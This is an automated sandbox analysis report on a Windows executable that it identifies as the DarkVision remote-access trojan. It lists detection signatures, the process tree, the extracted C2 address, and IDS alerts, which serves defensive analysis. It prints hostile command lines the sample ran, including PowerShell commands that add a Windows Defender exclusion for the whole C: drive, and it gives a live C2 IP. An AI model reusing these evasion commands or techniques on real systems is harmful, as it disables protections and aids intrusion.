Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
UZPt0hR.exe

Overview

General Information

Sample name:UZPt0hR.exe
Analysis ID:1657767
MD5:bf6f64455cb1039947a3100e62f96a52
SHA1:28cdd5c2e82d4ad078420dcbf4b32b928861fcb6
SHA256:c81ece0b60ed50db7d3769388f34ba051a05c95bd026e78dabb6ce08ff91bbba
Tags:DarkVisionRATexeuser-aachum
Infos:

Detection

DarkVision Rat
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DarkVision Rat
Yara detected UAC Bypass using CMSTP
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Creates HTML files with .exe extension (expired dropper behavior)
Creates autostart registry keys with suspicious names
Deletes itself after installation
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Searches for specific processes (likely to inject)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Windows Binaries Write Suspicious Extensions
Switches to a custom stack to bypass stack traces
Tries to evade analysis by execution special instruction (VM detection)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to load drivers
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Execution From GUID Like Folder Names
Sigma detected: Uncommon Svchost Parent Process
Spawns drivers
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • UZPt0hR.exe (PID: 6220 cmdline: "C:\Users\user\Desktop\UZPt0hR.exe" MD5: BF6F64455CB1039947A3100E62F96A52)
    • cmd.exe (PID: 2328 cmdline: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6764 cmdline: powershell.exe Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • svchost.exe (PID: 4900 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • tzutil.exe (PID: 7928 cmdline: "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" "" MD5: BCBEC32483EB43840823C4F6BD653779)
        • powershell.exe (PID: 8028 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 564 cmdline: powershell Remove-MpPreference -ExclusionPath C:\ MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7952 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat" """ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • w32tm.exe (PID: 7968 cmdline: "C:\Users\user\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" "" MD5: 15BDC4BD67925EF33B926843B3B8154B)
  • cleanup
{"C2": "82.29.67.160", "Port": 443}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1217083129.0000000000434000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
    00000000.00000002.1217083129.0000000000434000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      00000000.00000002.1217880005.0000000000958000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
        00000000.00000002.1217880005.0000000000958000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000005.00000002.2447683081.000002684C4A8000.00000002.00001000.00020000.00000000.sdmpJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
            Click to see the 5 entries
            SourceRuleDescriptionAuthorStrings
            5.2.svchost.exe.2684c470000.0.unpackJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
              5.2.svchost.exe.2684c470000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                5.2.svchost.exe.2684c470000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                • 0x36ee8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                • 0x36e18:$s1: CoGetObject
                • 0x36eb0:$s2: Elevation:Administrator!new:
                0.2.UZPt0hR.exe.95bfd8.1.raw.unpackJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
                  0.2.UZPt0hR.exe.95bfd8.1.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    Click to see the 6 entries

                    System Summary

                    barindex
                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\svchost.exe, ProcessId: 4900, TargetFilename: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', CommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\UZPt0hR.exe", ParentImage: C:\Users\user\Desktop\UZPt0hR.exe, ParentProcessId: 6220, ParentProcessName: UZPt0hR.exe, ProcessCommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', ProcessId: 2328, ProcessName: cmd.exe
                    Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\svchost.exe, ProcessId: 4900, TargetFilename: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\svchost.exe, ProcessId: 4900, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD}
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', CommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\UZPt0hR.exe", ParentImage: C:\Users\user\Desktop\UZPt0hR.exe, ParentProcessId: 6220, ParentProcessName: UZPt0hR.exe, ProcessCommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', ProcessId: 2328, ProcessName: cmd.exe
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat" """, CommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat" """, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\system32\svchost.exe", ParentImage: C:\Windows\System32\svchost.exe, ParentProcessId: 4900, ParentProcessName: svchost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat" """, ProcessId: 7952, ProcessName: cmd.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\UZPt0hR.exe", ParentImage: C:\Users\user\Desktop\UZPt0hR.exe, ParentProcessId: 6220, ParentProcessName: UZPt0hR.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 4900, ProcessName: svchost.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe Add-MpPreference -ExclusionPath 'C:', CommandLine: powershell.exe Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2328, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe Add-MpPreference -ExclusionPath 'C:', ProcessId: 6764, ProcessName: powershell.exe
                    Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\UZPt0hR.exe", ParentImage: C:\Users\user\Desktop\UZPt0hR.exe, ParentProcessId: 6220, ParentProcessName: UZPt0hR.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 4900, ProcessName: svchost.exe
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-04-06T13:44:10.003805+020020283713Unknown Traffic192.168.2.649695104.26.9.202443TCP
                    2025-04-06T13:44:13.014348+020020283713Unknown Traffic192.168.2.649698104.26.9.202443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-04-06T13:44:09.795711+020020456181A Network Trojan was detected192.168.2.64969482.29.67.160443TCP
                    2025-04-06T13:44:13.831664+020020456181A Network Trojan was detected192.168.2.64969982.29.67.160443TCP
                    2025-04-06T13:44:17.861581+020020456181A Network Trojan was detected192.168.2.64970082.29.67.160443TCP
                    2025-04-06T13:44:21.892985+020020456181A Network Trojan was detected192.168.2.64970282.29.67.160443TCP
                    2025-04-06T13:44:25.955331+020020456181A Network Trojan was detected192.168.2.64970482.29.67.160443TCP
                    2025-04-06T13:44:29.992304+020020456181A Network Trojan was detected192.168.2.64974282.29.67.160443TCP
                    2025-04-06T13:44:34.028953+020020456181A Network Trojan was detected192.168.2.64978382.29.67.160443TCP
                    2025-04-06T13:44:38.033545+020020456181A Network Trojan was detected192.168.2.64978482.29.67.160443TCP
                    2025-04-06T13:44:42.064816+020020456181A Network Trojan was detected192.168.2.64978582.29.67.160443TCP
                    2025-04-06T13:44:46.099141+020020456181A Network Trojan was detected192.168.2.64978682.29.67.160443TCP
                    2025-04-06T13:44:50.127172+020020456181A Network Trojan was detected192.168.2.64978782.29.67.160443TCP
                    2025-04-06T13:44:54.142482+020020456181A Network Trojan was detected192.168.2.64978882.29.67.160443TCP
                    2025-04-06T13:44:57.853171+020020456181A Network Trojan was detected192.168.2.64979082.29.67.160443TCP
                    2025-04-06T13:45:01.283283+020020456181A Network Trojan was detected192.168.2.64979282.29.67.160443TCP
                    2025-04-06T13:45:04.492557+020020456181A Network Trojan was detected192.168.2.64979382.29.67.160443TCP
                    2025-04-06T13:45:07.471313+020020456181A Network Trojan was detected192.168.2.64979482.29.67.160443TCP
                    2025-04-06T13:45:10.268106+020020456181A Network Trojan was detected192.168.2.64979582.29.67.160443TCP
                    2025-04-06T13:45:12.893716+020020456181A Network Trojan was detected192.168.2.64979682.29.67.160443TCP
                    2025-04-06T13:45:15.330069+020020456181A Network Trojan was detected192.168.2.64979782.29.67.160443TCP
                    2025-04-06T13:45:17.676086+020020456181A Network Trojan was detected192.168.2.64979882.29.67.160443TCP
                    2025-04-06T13:45:19.861199+020020456181A Network Trojan was detected192.168.2.64979982.29.67.160443TCP
                    2025-04-06T13:45:21.923905+020020456181A Network Trojan was detected192.168.2.64980082.29.67.160443TCP
                    2025-04-06T13:45:23.893341+020020456181A Network Trojan was detected192.168.2.64980282.29.67.160443TCP
                    2025-04-06T13:45:25.752018+020020456181A Network Trojan was detected192.168.2.64980382.29.67.160443TCP
                    2025-04-06T13:45:27.518769+020020456181A Network Trojan was detected192.168.2.64980482.29.67.160443TCP
                    2025-04-06T13:45:29.220743+020020456181A Network Trojan was detected192.168.2.64980582.29.67.160443TCP
                    2025-04-06T13:45:30.903302+020020456181A Network Trojan was detected192.168.2.64980682.29.67.160443TCP
                    2025-04-06T13:45:32.455270+020020456181A Network Trojan was detected192.168.2.64980782.29.67.160443TCP
                    2025-04-06T13:45:33.986674+020020456181A Network Trojan was detected192.168.2.64980882.29.67.160443TCP
                    2025-04-06T13:45:35.455483+020020456181A Network Trojan was detected192.168.2.64980982.29.67.160443TCP
                    2025-04-06T13:45:36.861277+020020456181A Network Trojan was detected192.168.2.64981082.29.67.160443TCP
                    2025-04-06T13:45:38.236341+020020456181A Network Trojan was detected192.168.2.64981182.29.67.160443TCP
                    2025-04-06T13:45:39.580138+020020456181A Network Trojan was detected192.168.2.64981282.29.67.160443TCP
                    2025-04-06T13:45:40.876785+020020456181A Network Trojan was detected192.168.2.64981382.29.67.160443TCP
                    2025-04-06T13:45:42.158908+020020456181A Network Trojan was detected192.168.2.64981482.29.67.160443TCP
                    2025-04-06T13:45:43.407964+020020456181A Network Trojan was detected192.168.2.64981582.29.67.160443TCP
                    2025-04-06T13:45:44.647295+020020456181A Network Trojan was detected192.168.2.64981682.29.67.160443TCP
                    2025-04-06T13:45:45.845448+020020456181A Network Trojan was detected192.168.2.64981782.29.67.160443TCP
                    2025-04-06T13:45:47.064438+020020456181A Network Trojan was detected192.168.2.64981882.29.67.160443TCP
                    2025-04-06T13:45:48.236043+020020456181A Network Trojan was detected192.168.2.64981982.29.67.160443TCP
                    2025-04-06T13:45:49.408290+020020456181A Network Trojan was detected192.168.2.64982082.29.67.160443TCP
                    2025-04-06T13:45:50.564819+020020456181A Network Trojan was detected192.168.2.64982182.29.67.160443TCP
                    2025-04-06T13:45:51.689360+020020456181A Network Trojan was detected192.168.2.64982282.29.67.160443TCP
                    2025-04-06T13:45:52.813971+020020456181A Network Trojan was detected192.168.2.64982382.29.67.160443TCP
                    2025-04-06T13:45:53.924518+020020456181A Network Trojan was detected192.168.2.64982482.29.67.160443TCP
                    2025-04-06T13:45:55.033468+020020456181A Network Trojan was detected192.168.2.64982582.29.67.160443TCP
                    2025-04-06T13:45:56.110939+020020456181A Network Trojan was detected192.168.2.64982682.29.67.160443TCP
                    2025-04-06T13:45:57.207136+020020456181A Network Trojan was detected192.168.2.64982782.29.67.160443TCP
                    2025-04-06T13:45:58.282669+020020456181A Network Trojan was detected192.168.2.64982882.29.67.160443TCP
                    2025-04-06T13:45:59.360936+020020456181A Network Trojan was detected192.168.2.64982982.29.67.160443TCP
                    2025-04-06T13:46:00.438925+020020456181A Network Trojan was detected192.168.2.64983082.29.67.160443TCP
                    2025-04-06T13:46:01.486282+020020456181A Network Trojan was detected192.168.2.64983182.29.67.160443TCP
                    2025-04-06T13:46:02.551514+020020456181A Network Trojan was detected192.168.2.64983282.29.67.160443TCP
                    2025-04-06T13:46:03.595136+020020456181A Network Trojan was detected192.168.2.64983382.29.67.160443TCP
                    2025-04-06T13:46:04.657792+020020456181A Network Trojan was detected192.168.2.64983482.29.67.160443TCP
                    2025-04-06T13:46:05.688847+020020456181A Network Trojan was detected192.168.2.64983582.29.67.160443TCP
                    2025-04-06T13:46:06.720508+020020456181A Network Trojan was detected192.168.2.64983682.29.67.160443TCP
                    2025-04-06T13:46:07.798363+020020456181A Network Trojan was detected192.168.2.64983782.29.67.160443TCP
                    2025-04-06T13:46:08.829818+020020456181A Network Trojan was detected192.168.2.64983882.29.67.160443TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: UZPt0hR.exeAvira: detected
                    Source: 5.2.svchost.exe.2684c470000.0.unpackMalware Configuration Extractor: DarkVision Rat {"C2": "82.29.67.160", "Port": 443}
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeReversingLabs: Detection: 75%
                    Source: C:\Windows\Temp\K47ZW3T_7928.sysReversingLabs: Detection: 33%
                    Source: UZPt0hR.exeVirustotal: Detection: 57%Perma Link
                    Source: Submited SampleNeural Call Log Analysis: 99.7%
                    Source: C:\Users\user\Desktop\UZPt0hR.exeCode function: 0_2_00405110 LocalAlloc,_memset,CryptBinaryToStringW,CryptBinaryToStringW,_memset,LocalFree,WaitForSingleObject,RtlExitUserThread,_memset,_memset,_memset,_memset,WaitForMultipleObjects,WaitForSingleObject,GetExitCodeProcess,WaitForSingleObject,WaitForSingleObject,CloseHandle,CloseHandle,LocalFree,LocalFree,CloseHandle,CloseHandle,0_2_00405110
                    Source: C:\Users\user\Desktop\UZPt0hR.exeCode function: 0_2_0041CFE0 CryptAcquireContextW,CryptCreateHash,WaitForSingleObject,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,CryptDestroyHash,0_2_0041CFE0
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C4753B0 LocalAlloc,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,CryptBinaryToStringW,CryptBinaryToStringW,lstrcpyW,LocalFree,WaitForSingleObject,RtlExitUserThread,WaitForMultipleObjects,WaitForSingleObject,GetExitCodeProcess,WaitForSingleObject,WaitForSingleObject,CloseHandle,CloseHandle,LocalFree,LocalFree,CloseHandle,CloseHandle,5_2_000002684C4753B0
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C48DC00 CryptAcquireContextW,CryptCreateHash,WaitForSingleObject,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,CryptDestroyHash,5_2_000002684C48DC00
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C48DD5A CryptReleaseContext,CryptDestroyHash,5_2_000002684C48DD5A
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C48DCF7 CryptReleaseContext,CryptDestroyHash,5_2_000002684C48DCF7
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C48DD1E CryptReleaseContext,CryptDestroyHash,5_2_000002684C48DD1E
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C48DD8F CryptReleaseContext,CryptDestroyHash,5_2_000002684C48DD8F
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008082FC malloc,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,free,15_2_008082FC
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0084F028 CryptGenRandom,RegSetValueExA,GetWindowsDirectoryW,15_2_0084F028
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_007F71EA CryptAcquireContextA,CryptCreateHash,15_2_007F71EA
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_007F71E8 CryptAcquireContextA,CryptCreateHash,15_2_007F71E8
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_007F7244 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,15_2_007F7244
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_007FE4C4 CryptAcquireContextA,CryptCreateHash,15_2_007FE4C4
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00808478 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,15_2_00808478
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_007FE510 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,15_2_007FE510
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: -----BEGIN PUBLIC KEY-----15_2_007E3268
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: -----BEGIN PUBLIC KEY-----15_2_0080F214
                    Source: tzutil.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

                    Exploits

                    barindex
                    Source: Yara matchFile source: 5.2.svchost.exe.2684c470000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UZPt0hR.exe.95bfd8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UZPt0hR.exe.95bfd8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UZPt0hR.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1217083129.0000000000434000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1217880005.0000000000958000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2447683081.000002684C4A8000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: UZPt0hR.exe PID: 6220, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4900, type: MEMORYSTR
                    Source: UZPt0hR.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.26.9.202:443 -> 192.168.2.6:49695 version: TLS 1.2
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C4797F0 SHGetKnownFolderPath,lstrlenW,CoTaskMemFree,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,5_2_000002684C4797F0
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008235CC FindFirstFileA,FindNextFileA,FindClose,15_2_008235CC
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00841C54 __doserrno,_errno,_errno,__doserrno,FindFirstFileA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,15_2_00841C54

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49694 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49699 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49700 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49702 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49704 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49783 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49784 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49787 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49790 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49788 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49792 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49795 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49794 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49798 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49800 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49797 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49799 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49802 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49803 -> 82.29.67.160:443
